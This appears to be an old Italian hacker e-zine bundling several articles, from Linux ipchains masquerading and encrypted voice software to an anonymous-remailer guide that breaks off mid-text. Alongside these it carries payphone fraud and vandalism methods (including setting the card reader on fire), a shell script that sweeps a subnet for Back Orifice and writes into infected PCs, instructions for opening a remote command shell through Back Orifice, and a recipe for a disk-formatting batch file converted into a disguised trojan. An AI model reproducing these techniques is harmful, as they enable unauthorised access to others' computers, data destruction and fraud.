.... nel caso non funzionasse (vi ricordate che vi avevo detto? : 
"aggiungete le seguenti linee" .. .che vuol dire che le precedenti sono 
rimaste e quindi potete bootare ancora il vecchio kernel ... altrimenti 
.... avanti col dischetto rescue....)
.........e con questo è tutto...... Byex LaNdo




+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-




					ROUTING E MASQUERADING IN LINUX



Il Routing e Masquerading in Linux (ovvero come navigare
sicuri in Internet utilizzando un firewall Linux)
in tv: le qualifiche del GP di Silverstone (azz!! Schumacher è
secondo !! ... mannaggia ad Hakkinen du caiz)
by LaNdo

Ero indeciso sull'argomento di questo articolo, poi ho pensato ai Lamah
(alcuni pure stupidi, altri solo esagitati) che girano in rete che con 
programmini stupidi presi chissà dove ti mandano in crash il tuo 
povero Winzozz mentre stai chattando su Irc o stai postando una 
domanda su un NewsGroup facendoti perdere oltre alla pazienza anche il 
filo logico...
In questo articolo descriverò come impostare il routing tra 2 o più pc 
di cui uno (il router vero e proprio) è in realtà un pc su cui "gira" 
Linux; sarà argomento dei prossimi articoli la configurazione 
dell'accesso PPP e la configurazione della funzione di filtro del 
Firewall (naturalmente il Linux); Non faccio riferimento a Firewall per 
Wincess (tipo Conseal o @t-guard,...) perchè notoriamente più facili da 
crashare ;-)
PS: Naturalmente per far funzionare quello che sto per spiegarvi avrete 
 bisogno di almeno 2 pc e almeno 2 schde di rete (compratevele le 
vendono pure in macelleria a £30.000 !!!)
avete installato Linux ?
avete installato le schede di rete ?
... se non l'avete fatto che state aspettando ?...
Vabbè bando alle bojate cominciamo:...
Linux:
prima di tutto bisogna compilare il kernel (lo sapete fare vero? ve l'h spiegato nel_
l'articolo precedente) con le seguenti funzioni abilitate:
-        Enable loadable module support (in modo da abilitare il 
         supporto per i moduli kernel, essendo il masquerading caricato 
         a livello di modulo) 
-        Networking support (mi sembra ovvio) 
-        Network Firewalls (abilitiamo le funzioni di firewall) 
-        TCP/IP Networking (supporto TCP/IP) 
-        IP: forwarding/gatewaying (abilitiamo le funzioni di
         forwarding dei pacchetti IP) 
-        IP: firewalling (di firewall) 
-        IP: masqueradnig (di masquerading) 
-        IP: always defragment 
-        Dummy net drive support
Per default assegnerò al server Linux l'ip 192.168.0.1 e al pc con 
windoze 192.168.0.2 il netmask (dipende da quanti pc avete...) nel 
nostro caso sarà 255.255.255.0 (... 254 pc ... e che c'avete un 
ufficio in casa ?) 
per assegnare l'ip:
ifconfig eth0 192.168.0.1 netmask 255.255.255.0
/sbin/ipchains -P forward DENY
/sbin/ipchains -A forward -s 192.168.0.0/5 -d 0/0 -j MASQ
echo 1 > /proc/sys/net/ipv4/ip_forward
(questi ultimi 3 conviene metterli in uno dei file contenuti nella dir:
/etc/rc.d in modo da farlo partire all'avvio).
cmq....
Il Server Linux dovrà avere l'accesso PPP già abilitato (si trovano gli 
script dappertutto ormai) (cmq vi rimando alla proxxima volta ... (PS: 
preferite una spiegazione sull'accesso PPP o una spegazione sul 
Firewalling in Linux? Ditemelo!: attila_hack@hotmail.com)
In realtà il server Linux avrà 2 indirizzi ip:
- il primo relativo alla nostra mini rete casalinga
- il secondo relativo alla connessione dial-up (internet)
... ok il nostro pc Linux è ora pronto per condividere l'accesso a 
Internet .... 
- Winlose 9x (configurazione)
Tra le impostazioni della rete (relativa alla scheda di rete) vanno 
impostati:
-Gateway predefinito: indirizzo ip del pc Linux (nel ns caso: 
192.168.0.1) (questo permetterà che le richieste per internet vengano 
fatte direttamente al server Linux)
-Server DNS: gli stessi assegnati al pc Linux (per intenderci quelli 
che avete inserito nello script PPP per la connessione ad internet su 
Linux) (questo permetterà di effettuare il resolving dei nomi dei 
domini (potreste farne anche a meno ...se vi ricordate che l'indirizzo
204.71.200.75 corrisponde a www.yahoo.com)
-Ip: naturalmente quello che vi pare (pure conforme al netmask ... 
sinnò la rete ve la scordate...) nel ns caso: 192.168.0.2
un consiglio:
non a caso ho usato l'ip 192.168.0.0 - 192.168.255.255
questo range di ip è reso apposta disponibile per questo genere di cose 
dall'autorità per l'assegnazione degli indirizzi IP (IANA)
.... e con questo ho concluso... un ringraziamento a BoBo.
..... per qualunque suggerimento emailate pure ... questo è il primo di 
una lunga serie di articoli (spero interessanti)...
.... attenti .... la micia mascherata vi osserva ....
Byex LaNdo






+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-


  _________             .__                      
 /   _____/ ____ _______|__| ____   ____   ____  
 \_____  \_/ __ \\___   /  |/  _ \ /    \_/ __ \ 
 /        \  ___/ /    /|  (  <_> )   |  \  ___/ 
/_______  /\___  >_____ \__|\____/|___|  /\___  >
        \/     \/      \/              \/     \/ BoBo & LaNdo
__________.__                          __   .__                
\______   \  |_________   ____ _____  |  | _|__| ____    ____  
 |     ___/  |  \_  __ \_/ __ \\__  \ |  |/ /  |/    \  / ___\ 
 |    |   |   Y  \  | \/\  ___/ / __ \|    <|  |   |  \/ /_/  >
 |____|   |___|  /__|    \___  >____  /__|_ \__|___|  /\___  / 
               \/            \/     \/     \/       \//_____/  




 	D'AMORE DI PHREAKING E DI ALTRE SCIOCCHEZZE: by The Pac-man 
 
       
DISCLAIMER LEGALE:	
Questo documento è di solo scopo informativo e il suo autore declina ogni responsabilità
da ogni suo qualunque utilizzo.
Queste cose sono state già dette e stradette, se non vogliamo pagare le telefonate,
mettiamoci il cuore in pace perché i metodi di seguito elencati funzicano una volta su tre.
I metodi :
Usare una scheda con duecento lire e un'altra possibilmente carica.
Usare 3 schede di cui due completamente scariche.
Dare fuoco al lettore (con questo metodo non si ottiene niente).
Stracciare la cornetta (un souvenir della giornata).
1° Metodo
Inseriamo nel lettore la scheda con duecento lire e poi quando sono finite inseriamo
l'altra scheda non lasciandola andare, facendo ciò dovremmo sentire il rumore del lettore
che cerca di prendere la scheda, terminata la conversazione tiriamo fuori la scheda e 
riagganciamo.
2° Metodo
(questa non so se funziona)
Inseriamo una scheda carica nel lettore e componiamo il numero, poi quando il lettore
a letto l'importo inseriamo le altre due schede, cercando di non farle accavallare e 
sempre cercando di fare uscire la scheda carica, telefonare al nostro amico emigrato a 
Haiti e poi riagganciare tanto paga MAMMA TELECOM.
3° Metodo
Inseriamo quanti più fiammiferi anti-vento accesi abbiamo all'interno del lettore oppure
spruzziamo poca (ma poca sul serio se no scoppia) benzina nel lettore e poi appicchiamo 
il rogo.
4° Metodo
Prendiamo una tenaglia e tagliamo il filo della cornetta.
Tanto semplice.
Per informazioni mandatemi un e-mail all'indirizzo pac_man@freemail.it se avete sfide 
all'incontrario di molti io le accetto girandole ai più potenti della RTI italiana.
Un saluto a Lele, Marco, Tony, i Matrix, il mio ex-sito, Oldiron e tutti gli Attila_Hack.


P.s. = Più che "HACK THE WORLD", è meglio "TROMBATI NA BELLA FIGA". 






+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-



COME CRITTARE LE TELEFONATE E PAGARE UN'URBANA INVECE CHE UN'INTERURBANA: by BugByte 
 
Ciauz all ;o) !
Come tutti saprete non è affatto sicuro parlare al telefono perchè qualsiasi deficente
puo ascoltare le nostre telefonate... Saprete anche che in italia le interurbane
(e non solo) sono tra le piu costose del mondo (azz!). 
  
Ebbene oggi grazie a internet si possono risolvere questi 2 problemi, cioè parlare
senza permettere a un terzo di ascoltarci e pagare una telefonata urbana invece di
un'interurbana (wow!). Questo è reso possibile da alcuni programmi  che crittano le
telefonate (utilizzando anche una crittazione piuttosto robusta) e che permettono di
parlare con una  persona dall'altra parte della terra passando per il proprio provider.
Naturalmente anche l'altra persona deve entrare in internet per riuscire a parlare con
voi pagando un'urbana.. Mentre per crittare solamente la telefonata si puo fare una
connessione dial-up tra i due modem (uno chiama e l'altro aspetta la chiamata). Se dovete 
fare una connessione urbana i vantaggi della connessione diretta sono: in internet la
velocità di connessione (a meno che non abbiate una connessione ISDN.. =) calerà parecchio
dato il traffico che c'è in rete, con una connessione diretta una sola persona paga mentre
nella connessione che passa per internet entrambe le persone pagano. 
Questo tipo di comunicazione pero è piuttosto scomoda anche se offre una quasi totale
sicurezza, sia per il fatto che entrambe le persone devono avere il modem, sia per il
fatto che la connessione molte volte quando si critta il tutto risulta piuttosto lenta e
che in alternativa bisogna parlare in uno alla volta e passare all'altro tutte le volte
che si ha finito. Io a questo punto preferisco far ascoltare le telefonate se non ho nulla
da nascondere e se ho qualcosa da nascondere non dirla via telefono. Certo se avete degli
amici che abitano in inghilterra e volete fare lunghe chiacchierate con loro(come nel mio
caso ;o) - magari senza crittare la telefonata - questi programmi sono l'ideale. 
Prima dicevo: quasi totale. Voi allora potreste chiedervi: ma non c'è una totale sicurezza?
Beh in effetti, facendo i pignoli, se qualcuno è DAVVERO interessato alla nostra telefonata
ed è davvero determinato allora potrebbe farcela..
Ad esempio potrebbe riuscire ad avere la chiave della crittazione o potrebbe registrare il
tutto e decrittarlo in seguito . Cmq gente non preoccupativi c'è una possibilita su cento
che ci riesca ;PP. Comunque è giusto che sappiate che un possibilita c'è.. 
 
A questo punto credo vogliate provare qualche programma ;oD
Qui sotto ecco due progs tra i piu noti e il rispettivo url (P.S di entrambi sono
disponibili i sorgenti)
Nautilus http://www.lila.com/nautilus
Speak Freely http://www.fourmilab.ch/speakfree/windows
   
Questi programmi sono considerati dal governo americano come un' ARMA,  infatti è vietata
l'esportazione dagli stati uniti ! Se vi trovate davanti a un programma del genere messo a
disposizione da un server statunitense, non si puo scaricare. Cmq non preoccupatevi dai link
che vi ho elencato si possono scaricare tranquillamente  ;-D. 
Ora vi spieghero brevemente le caratteristiche di questi due progs..
Speak freely è disponibile sia per window (3.1,95,98,NT) sia per sistemi unix. Per fare
girare questo progs è necessario un 486, un modem a 14.400, una scheda audio e un microfono.
Con questo progs è anche possibile parlare con piu persone contemporaneamente (weoowo!)  
E' anche facile da usare e quindi lo consiglio ai neofiti (come me!)
Nautilus è il progs che preferisco. Le richieste hardware sono molto meno esose (un 386
con un modem a 7.200 ) - come se Speak freely chiedesse un computer di ultima generazione
ehehhe - e inoltre dispone di un protocollo di compressione piu avanzato rispetto a Speak
freely.. Nautilus gira sia sui personal computer - con linux, msdos o solaris X86 - sia su
una Sun Sparctation  (Solaris o SunOS). Sconsiglio di farlo girare su winz... E' un po piu
tosto da utilizzare rispetto a Speak freely perchè non dispone di un'interfaccia grafica..
Ciauz ! Spero che questo piccolo articolo sia servito a qualcosa !



+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
_________________________________________________________________________
_/~~~~~~\__/~~~~~~~~\_/~~~~~~~~\_/~~~~\__/~~~~~~\__/~~\__/~~\_/~~~~~~~~\_
/~~\_______/~~\____________/~~\___/~~\__/~~\__/~~\_/~~~~\/~~\_/~~\_______
_/~~~~~~\__/~~~~~~\______/~~\_____/~~\__/~~\__/~~\_/~~~~~~~~\_/~~~~~~\___
______/~~\_/~~\________/~~\_______/~~\__/~~\__/~~\_/~~\/~~~~\_/~~\_______
_/~~~~~~\__/~~~~~~~~\_/~~~~~~~~\_/~~~~\__/~~~~~~\__/~~\__/~~\_/~~~~~~~~\_
_________________________________________________________________________
_____________________________________BoBo & LaNdo______
/~~\________/~~~~~~\__/~~\__/~~\__/~~~~~~\__/~~\__/~~\_
/~~\_______/~~\__/~~\_/~~~\/~~~\_/~~\__/~~\_/~~\__/~~\_
/~~\_______/~~~~~~~~\_/~~~~~~~~\_/~~~~~~~~\_/~~~~~~~~\_
/~~\_______/~~\__/~~\_/~~\__/~~\_/~~\__/~~\_/~~\__/~~\_
/~~~~~~~~\_/~~\__/~~\_/~~\__/~~\_/~~\__/~~\_/~~\__/~~\_
_______________________________________________________



COME VALANGARE DI PING UN IP (SULLA PORTA DI BO) CON LA LEGGE DALLA NOSTRA PARTE: by Mr.Lamah

Ehehehehehe lo sapevate che il ping di BO non è configurato come sabotaggio informatico,
violazione della privacy e roba del genere?
Infatti la legge del 23 dicembre 1993 n. 547 definisce i "reati informatici", 
ma il semplice PING del Back Orifice non e', in se', reato (non configura ne' 
la fattispecie di "alterazione di funzionamento", ne' quella di "violenza sulle cose"
in senso lato).
L'unica apparenza di punibilita' percio' (nel caso di un PING) deriva da come tale PING 
e' stato inviato, i.e. usando un client Back Orifice? Nel caso, il pingatore e' in 
possesso di uno strumento "atto a...", e quindi (in teoria!) si configura la 
fattispecie di possesso di strumento idoneo a introdursi in un sistema telematico 
od informatico (art. 615 quater).
Per esempio il seguente script
        ...
        for i in $ICMP_FOUND_HOSTS; do
            if ( bo_ping $i 31337 "" ); then
                cat <<-HERE | bo_send $i 31337 "" 9
                        Non dovrei essere qui. Lei ha
                        installato BACK ORIFICE sul suo
                        PC. Per rimuoverlo, consulti
                        SUBITO http://attilahack.cjb.net
                        ---
                        Finche' non lo fara', sara' possibile
                        a me o ad altri ENTRARE NEL SUO PC!
                HERE
            fi
        done
        ...
questo genera una marea di PING su una sottorete, ma, noi abbiamo solo avvertito al 
boservizzato che è possibile entrare nel suo pc quindi vai a dimostrare la mia mala fede.
Completamente diverso e' invece il discorso, per chi si spinge al di la' del 
semplice "ping". Ma questa è un'altra storia...
Ciao a tutti e un sentito ringraziamento a tutto il team di Attila_Hack.
HAPPY LAMING by Mr. Lamah (Attila_Hack MemberZ)



+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-



			INTERAGIRE CON BO TRAMITE TELNET: by Mr.Lamah
Per quanto riguarda interagire in una sessione telnet con BO, telnet si può aprire
dal client Bo con il  comando App Add, si deve scrivere nella finestra exe.location 
Command.com e scegliere una porta a piacere come listen port. Poi si fa telnet 
all'indirizzo ip target sulla porta appena scelta... E' una vera e propria shell.
Per quanto riguarda invece il comunicare col server del BO tramite
telnet, cioe' collegarsi alla sua 31337 (o qualunque altra porta
abbia configurato) con telnet, non si puo' fare. Il motivo e' che BO
usa UDP, mentre telnet usa TCP.
HAPPY LAMING by Mr. Lamah (Attila_Hack MemberZ)





+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-



    ___       ___       ___       ___       ___       ___       ___   
   /\  \     /\  \     /\  \     /\  \     /\  \     /\__\     /\  \  
  /::\  \   /::\  \   _\:\  \   _\:\  \   /::\  \   /:| _|_   /::\  \ 
 /\:\:\__\ /::\:\__\ /::::\__\ /\/::\__\ /:/\:\__\ /::|/\__\ /::\:\__\
 \:\:\/__/ \:\:\/  / \::;;/__/ \::/\/__/ \:\/:/  / \/|::/  / \:\:\/  /
  \::/  /   \:\/  /   \:\__\    \:\__\    \::/  /    |:/  /   \:\/  / 
   \/__/     \/__/     \/__/     \/__/     \/__/     \/__/     \/__/  
    ___       ___       ___       ___       ___ BoBo & LaNdo    ___   
   /\__\     /\  \     /\  \     /\  \     /\  \     /\__\     /\  \  
  /:/ _/_   _\:\  \   /::\  \   _\:\  \   _\:\  \   /:| _|_   /::\  \ 
 |::L/\__\ /\/::\__\ /::\:\__\ /\/::\__\ /\/::\__\ /::|/\__\ /:/\:\__\
 |::::/  / \::/\/__/ \;:::/  / \::/\/__/ \::/\/__/ \/|::/  / \:\:\/__/
  L;;/__/   \:\__\    |:\/__/   \:\__\    \:\__\     |:/  /   \::/  / 
             \/__/     \|__|     \/__/     \/__/     \/__/     \/__/  





  
       *******************************                               
       *                             *                            
       *   VIRING CHE PASSIONE!!     *                       
       *                             *                                 
       *                 by Ritz     *                             
       *                             *
       *  Collaboration by Quequero  * 
       *                             *
       *******************************                                        
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
DESCLAIMER (anche se non servirebbe fa sempre comodo...):
Programmare virus per uso DIDATTICO e PERSONALE non Š illegale, ma lo Š 
distribuire i propri virus per danneggiare altri sistemi. L'autore, Ritz,
non ha mai nŠ prodotto nŠ distribuito virus, appunto, e non avvalla alcun uso
illegale del presente articolo: esso Š stato scritto a PURO scopo DIDATTICO.
Se il lettore si ritiene offeso dai suoi contenuti Š pregato di interromperne
immediatamente la lettura. Inoltre, lo stesso autore non si ritiene
responsabile se distruggete il computer VOSTRO o di qualcun altro dopo aver
letto questo articolo.
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
Ciao a tutti!!
Come avrete gi… letto nell'intestazione e nel DESCLAIMER io mi chiamo
Ritz, e ho deciso di fare questo articolo perchŠ gli altri argomenti
della rivista erano gi… tutti occupati... :-) suvvia, scherzavo, l'ho scritto
semplicemente perchŠ avevo voglia di provare a scrivere per una e-zine
rendendomi (spero) utile. Sappiate che questo Š la mia prima pubblicazione
per una rivista (e probabilmente dopo che BoBo la legger… sar… anche
l'ultima ;-) ), quindi non lapidatemi se secondo voi sono stato troppo poco
chiaro (cmq non penso :)).
Thanks & greets 2:-Tutto lo staff di softpj e BFI, siete mitiiiiiciii!
                  -Tutto lo staff dei Ringzer0, e in particolare +MaLaTTia,
                   con me molto gentile in IRC, spero di diventare come voi!!
                  -Quequero: il suo sito Š stato anche il primo da me
                   Teleportato! (Chiss… perchŠ! ;-) ).
                   Egli inoltre mi ha aiutato nella stesura di questo articolo
                   consigliandomi dei cambiamenti in alcuni punti. Grazie QUE!
                   SEI MITIIIICOOOO!!
                  -Due amici di IRC compagni di classe (DFX e il Mora).
                  -WhiteFly, anche lui molto disponibile su IRC. Ciaoooo!!!
                  -xOANINO, sicuramente uno dei migliori crackers italiani
                   dopo i Ritz (che battuta idiota... perdonami xOA non volevo
                   offenderti :) ) e probabilmente del mondo! SEI UN
                   GEEENIOOOOOOO!!!
                  -Altri vari amici di IRC in ordine sparso ([aLT255],
                   ^courier, moonshadow, ecc.].
                  -Tutti gli Attila_Hack members e in particolare BoBo.
                  -Tutti quelli che so che dovevo ringaziare fino a 5 minuti
                   fa ma che ora non mi ricordo pi- chi sono (frase
                   lineare e coerente!).
Fuck to         : -Un' azienda italiana (di cui non faccio il nome, IHIHIHIH)
                   che si okkupa di telefonia fissa.
                  -Al pi- ricco Bill del pianeta: per te non posso dire altro
                   che: VAMMORIAMMAZZATO (Anche se non sono de Roomaaa).
                
          
Dopo 20 minuti buoni per arrivare a scrivere fin qui (suvvia, Š il mio 1ø
articolo dopotutto) voi starete già dicendo: CHE PALLE! giusto? Bene, allora
iniziamo!
In queste righe vorrei introdurvi al concetto di virus e spiegare i vari tipi
che esistono [se state leggendo sperando alla fine di poter mandare in casino
un picc, beh avete sbagliato articolo (o quasi?)].
Dunque dunque...
Secondo il va/occabolario, un virus (informatico, si intende) Š un "Programma,
creato a scopi di sabotaggio o vandalismo, che si trasmette tramite floppy
disk o reti telematiche e danneggia o blocca il funzionamento di un computer
o ne distrugge i dati memorizzati", e fin qui spero che sapeste gi• tutto,
altimenti... ora lo sapete :-)
Ma come viene scritto un viruz?
Beh, un viruz si pu• scrivere in vari linguaggi (Pascal, C, Visual Basic
(con quest'ultimo cmq intendo i macro virus) ), ma il modo pi- efficace per
aver tutto il computer sotto il proprio controllo Š sicuramente l'Assembly: la
stragrande maggioranza di viruz (se si escludono i macro virus) sono scritti
proprio a basso livello.
Naturalmente, essi possono essere scritti anche con linguaggi al alto livello
(basti pensare che per formattare un disco basta un file BAT creato con l'EDIT
del DOS: "echo |s format c:"), ma questi sono meno "liberi", in quanto non
hanno il pieno potere su ogni singolo bit della macchina.
Ma vediamo ora le categorie in cui essi si suddividono:
WORMS
TROJANS
VIRUZ
WORMS
Ossia vermi, in pratica sono dei virus che si riproducono da PC a PC
attraverso la rete. Il pi- celebre esempio Š quello di Robert Morris, che ne
cre• uno (anni '80) il quale infetto moltissimi computer molto rapidamente
grazie un bug indovinate un po' di che: SENDMAIL... strano eh?
TROJANS
E qui arriva il bello: i "Cavalli di Troia"! Non sto a spiegarvi la leggenda
dei greci, l'avrete sentita 6372 volte e ne avrete due ***** cos, quindi
niente epica per oggi.
I trojan sfruttano proprio lo stesso processo: essi sono proggies tipo BO o
NETBUS (W il laming!) che possono darti il controllo completo di un PC, ma
sono anche viruz pi- semplici: ad esempio, create con il Blokko Note un file
avente come unica riga di testo "echo |s format c:" (SENZA VIRGOLETTE),
chiamatelo xyz.bat, procuratevi l'utility BAT2COM (la trovate sul sito di
Quequero, OBBLIGATORIO VISITARLO), usatela per convertire xyz.bat in xyz.com,
NON eseguitelo e... provatelo se dovete reinstallare Winkaz perchŠ si Š
inkiodato perennemente (W Bill): immaginate un po' cosa si pu• fare solo con
Blokko Note. Il motto quindi Š: SPAZIO ALLA FANTASIA.
VIRUZ
Ahia, qui si va sul complicato: essi sono i veri e propri viruz scritti
specialmente in Assembly, e il loro scopo Š quello di riprodursi il pi-
possibile. Ah ecco, a proposito riporto qui di seguito una storiella trovata
su Internet (c'Š anche sul sito di Quequero, giuro non l'ho copiata).
MA WINDOUZ E' UN VIRUZ?
Dunque, la questione Š molto aperta, analizziamola in dettaglio:  
1- I virus possono distruggere un computer e cancellare accidentalmente dati.
   WINDOUZ E' UN    VIRUS.
2- I virus ri replicano velocemente. WINDOUZ E' UN VIRUS.
3- I virus rallenatano i sistema al punto che ti vien voglia di spaccare il
   monitor a calci.    WINDOUZ E' UN VIRUS.
4- I virus infettano i programmi principali. WINDOUZ E' UN VIRUS.
Per• c'Š da dire altro: i virus sono compatti, veloci, efficienti, funzionano
in qualunque PC, sono GIOIELLINI dell'Assembly, si migliorano col passare del
tempo: allora ecco scpiegato perchŠ WINDOUZ non Š un virus (convinti?).
                                                COME VOLEVASI DIMOSTRARE                                                            
Tornando a noi, ecco i principali tipi di viruz:
MACRO VIRUS
Sono dei virus scritti in Visual Basic, rappresentano circa l'80% della
categoria, possono infettare il PC se il file Word, Excel, ecc. viene aperto
attivando la macro, altrimenti non vengono attivati, appunto.
Gli effetti possono essere i pi- svariati, e non riguardano solo
l'applicazione o il file che supportano la macro, ma anche tutto il sistema.
FILE VIRUS
Infettano i file EXE, COM, DLL, DRV, VXD copiandoci il proprio codice di
infezione quando un altro programma infettato viene aperto. Possono essere
residendi (se rimangono nel codice del programma vittima dopo la sua chiusura)
o non residenti (se non ci rimangono).
VIRUS POLIMORFICI
Sono virus molto difficili da individuare in quanto cambiano il loro codice
virale ogni volta che infettano un file. Una volta mi ricordo mi Š capitato
uno di questi virus: ci ho messo 2 giorni per pulire tutto e dopo una
settimana mi Š ricomparso!
BOOT VIRUS
Ops li stavo dimenticando: semplice, sono virus che infettano i settori di
boot di un disco fisso o floppy impedendo, appunto, il boot da essi. Sono
comunque facilmente eliminabili, ad esempio spesso se Winkaz è infettato
basta farlo ripartire da un floppy sano e ripristinare tutto con un
antivirus... per il resto non fanno null'altro. A volte (ma non sempre) pu•
persino bastare fare il boot da floppy e con il comando "sys a: c:" oppure
"fdisk /mbr" (il comando ripulisce il Master Boot Record: NON utilizzatelo se
avete un Boot Loader installato, ad esempio LILO) per mettere tutto a posto.
VIRUS MULTIPARTITI
Questi sono simili ai BOOT VIRUS, per• una volta che c'Š il boot vengono
eseguiti; infettano anche altri file di sistema. Non male.
STEALTH
Vengono chiamati cos perchŠ sono nascosti e possono interagire con
moltissime funzioni del S.O. prendendone il controllo e cambiando un po' di
robette, precisamente hookando varie funzioni e manipolandole.
COMPANION
Molto carini, in pratica si insediano in una o pi- cartelle, creando file
COM con lo stesso nome dei file EXE nascondendo questi ultimi. Naturalmente,
Windouz eseguir… i COM dando loro la precedenza sugli EXE. Immaginate un po'
le conseguenze possibili...
VIRUS IN THE WILD
ne ho sentito parlare molto poco, sono virus scappati dai laboratori di
ricerca (?!#@&%œ$) e potenzialmente molto distruttivi. Non so altro su di
essi a parte che in libera circolazione ce ne sono circa 300.
Oltre a tutti questi ce ne sarebbero altri, es. gli Armored, i Clean On The
Fly (si cancellano dal file vittima quando questo viene letto), gli MBR
stealth, ecc..., ma questi sono meno diffusi e poi per oggi penso che basti
cos. Se volete saperne di pi- cercate su Altavista o...
chiedetemeli... :))) (scherzo eh?)
Bene, penso di aver finito... ho cercato di essere abbastanda rapido ma
chiaro (spesso questi articoli skazzano il lettore :-( ). Per qualunque
domanda, insulto, ringraziamento, ecc.... scrivetemi pure all'indirizzo
sotto.
Ringrazio tutti coloro che sono arrivati fin qui nella lettura e colgo
nuovamente l'occasione per ringraziare Quequero per i suoi suggerimenti.
CIAO A TUTTI!
                ****************************************************
                *                                                  *
                *                       Ritz                        *
                *                Eclyps3@excite.com                *
                * - The way is made clear when viewed from above - *
                *                On ICQ: 41793377                  *                       
                *                  On IRC: Ritz                    *
                *                                                  *
                ****************************************************



+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-






________      ________          BoBo & LaNdo         _____      
____  _/_________  __/_____     ___   _______ __________(_)____ 
 __  / __  __ \_  /_ _  __ \    __ | / /  __ `/_  ___/_  /_  _ \
__/ /  _  / / /  __/ / /_/ /    __ |/ // /_/ /_  /   _  / /  __/
/___/  /_/ /_//_/    \____/     _____/ \__,_/ /_/    /_/  \___/ 
                                                                



COSA SONO E COME SI USANO GLI ANONYMOUS REMAILER: by Quequero
La vera ricchezza non si misura con i soldi che possediamo, ma con la cultura che ci
portiamo dietro.
Quequero 
Stavolta non crackerò ne reverserò un bel niente ma tratteremo un argomento lo stesso
interessante cioè l'utilizzo degli Anonymous Remailer....Perchè la UIC non è solo
Reversing :) 
Home page: http://quequero.cjb.net 
E-mail: UIC@mail.usa.com
chan: #crack-it, UIN: 41703512 
Difficoltà: Newbies-Intermedio
Introduzione:
Più passa il tempo e più l'anonimità diventa una cosa di fatto, sempre più spesso abbiamo
bisogno di restare anonimi e cercare di far sapere a meno gente possibile informazioni su 
di noi, bhè dal momento che uno dei modi più semplici per essere beccati è l'e-mail allora
iniziamo ad anonimizzarla. 
Tools usati:
Il pgp anche se opzionale (www.pgpi.com) un cervello, una mano ed un occh 
Essay 
Come vi accennavo stavolta parleremo degli anonymous remailer, ma prima diamo uno sguardo
alle lettere che ci arrivano e cerchiamo di capire perchè è poco sicuro spedire lettere a 
destra e a manca senza opportune precauzioni. 
Supponiamo di mandare una mail anonima ma come tutti dovreste sapere le mail mantengono un
header nel quale c'è scritto praticamente tutto, ecco un esempio reale di header: 
Mittente: mittente@tin.it 
Ricevente: ricevente@tin.it 
Return-Path: <mittente@tin.it> ;Path di ritorno della mail
Received: from utente ;Ricevuto da utente (utente è l'id usato per la connessione alla) 
([212.216.180.212]) ;IP del mandante (questo è importante) 
by fep12-svc.tin.it ;Host del mittente
(InterMail v4.0 201-221-105) with ESMTP ;Versione del programma usato dal server per mandare 
la posta
id <19990604173132.XESA3606.fep12-svc@utente> ;Anno-Mese-Giorno-Ore-Minuti-Secondi.alcunidati.
ID_host@UserID
for <ricevente@tin.it>; ;Indirizzo del destinatario 
Fri, 4 Jun 1999 17:31:32 +0200 ;Ora e data all'atto della ricezione della mail 
e il codice fiscale? :)
From: "Mittente della Lettera" <Mittente@tin.it> ;Nome e indirizzo del mittente
To: "Ricevente della lettera" <Ricevente@tin.it> ;Nome e indirizzo del ricevente
Subject: Soggetto del messaggio ;Soggetto del messaggio
Date: Fri, 4 Jun 1999 17:28:01 +0200;Ora e data all'atto della trasmissione 
X-MSMail-Priority: Normal ;Priorità della mail
X-Priority: 3
X-Mailer: Microsoft Internet Mail 4.70.1155
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Message-Id: <19990604173132.XESA3606.fep12-svc@utente> ;Anno-Mese-Giorno-Ore-Minuti-Secondi.
alcunidati.
ID_host@UserID
Ci manca qualcosa? Credo niente, giusto giusto ci potevano mettere il numero di carta di 
